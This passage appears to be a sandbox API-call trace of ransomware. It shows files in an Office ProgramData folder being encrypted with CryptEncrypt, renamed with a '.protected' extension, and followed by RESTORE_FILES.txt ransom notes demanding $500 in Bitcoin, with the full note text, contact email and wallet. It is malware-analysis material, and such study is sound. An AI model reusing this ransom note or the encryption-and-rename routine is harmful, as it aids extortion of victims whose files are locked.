(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.655] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.655] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.655] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.655] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.655] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.655] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.677] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.678] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.693] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.693] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.764] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.764] CloseHandle (hObject=0xd8) returned 1 [0070.765] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.protected") returned 81 [0070.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.protected")) returned 1 [0070.766] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Windows") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.766] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.766] lstrcmpW (lpString1="XLINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.766] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.766] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.767] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.870] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.870] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.871] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.871] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.901] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.901] CloseHandle (hObject=0xd8) returned 1 [0070.902] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.protected") returned 82 [0070.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.protected")) returned 1 [0070.903] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Windows") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="System Volume Information") returned 1 [0070.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrIW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.903] lstrcmpW (lpString1="XLINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.903] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.903] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.903] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.903] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.903] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.903] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.904] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.906] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.906] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.906] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.906] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.924] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.924] CloseHandle (hObject=0xd8) returned 1 [0070.925] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.protected") returned 83 [0070.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.protected")) returned 1 [0070.926] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Windows") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.926] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.926] lstrcmpW (lpString1="XLSLICER.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.926] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.938] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.938] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.939] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.939] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.939] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.939] CloseHandle (hObject=0xd8) returned 1 [0070.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.protected") returned 82 [0070.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.protected")) returned 1 [0070.941] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0070.941] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0070.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt") returned 69 [0070.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0070.941] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.941] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0070.942] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0070.942] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0070.942] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.942] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0070.942] CloseHandle (hObject=0xd4) returned 1 [0070.943] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0070.943] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0070.943] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt") returned 64 [0070.943] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0070.943] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.943] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0070.944] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0070.944] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0070.944] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.944] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0070.944] CloseHandle (hObject=0xb4) returned 1 [0070.944] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0070.944] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0070.945] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\RESTORE_FILES.txt") returned 53 [0070.945] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0070.945] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur 